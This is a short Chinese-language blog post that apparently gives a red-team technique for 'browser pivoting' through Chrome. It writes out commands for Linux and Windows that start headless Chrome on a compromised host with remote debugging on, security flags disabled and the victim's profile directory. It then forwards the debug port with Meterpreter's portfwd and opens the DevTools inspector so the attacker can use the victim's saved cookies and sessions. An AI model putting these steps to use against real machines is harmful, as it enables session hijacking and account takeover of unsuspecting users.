# Chrome Browser Pivoting

前言

• 上个星期有人在QQ群问到CobaltStrike里的一个功能Browser Pivoting，官方文档。有没有Chrome版的(自带的字支持IE浏览器)，我隐隐约约记得Metasploit里有一个模块，但是这个是chrome debugger的辅助模块，平时也写前端，会用到chrome浏览器调试，就知道有这么一个功能可以利用远程调试实现Browser Pivoting。

思路

启动远程调试

• Linux下的

google-chrome-stable --allow-file-access-from-files --no-sandbox --disable-popup-blocking --remote-debugging-port=9222 --disable-web-security --headless --user-data-dir=”/home/kali-team/.config/google-chrome“

• Windows下的

"C:UsersAdministratorAppDataLocalGoogleChromeApplicationchrome.exe" --safebrowsing-disable-auto-update --disable-sync --metrics-recording-only --mute-audio --no-first-run --disable-web-security --disable-gpu --disable-popup-blocking --allow-file-access-from-files --headless --no-sandbox  --user-data-dir="C:UsersAdministratorAppDataLocalGoogleChromeUser Data"  --remote-debugging-port=9222

• 一定要设置--user-data-dir参数，不然利用不了保存在本地的cookie和session。

端口映射

• 你怎么喜欢怎么来，用什么方法随便你。

portfwd add -L 0.0.0.0 -l 9222 -p 9222 -r 127.0.0.1

• 把远程端口9222映射到本地的9222

打开本地浏览器

• 访问：http://127.0.0.1:9222/json

[ {
   "description": "",
   "devtoolsFrontendUrl": "/devtools/inspector.html?ws=127.0.0.1:9222/devtools/page/55337A3040EA9F48A491F49866699575",
   "id": "55337A3040EA9F48A491F49866699575",
   "title": "about:blank",
   "type": "page",
   "url": "about:blank",
   "webSocketDebuggerUrl": "ws://127.0.0.1:9222/devtools/page/55337A3040EA9F48A491F49866699575"
} ]

• 开发文档：这里

• 打开：http://127.0.0.1:9222/devtools/inspector.html?ws=127.0.0.1:9222/devtools/page/55337A3040EA9F48A491F49866699575

• 这样就可以利用对方的浏览器cookie和session了，界面有点想平板。不知道怎么调。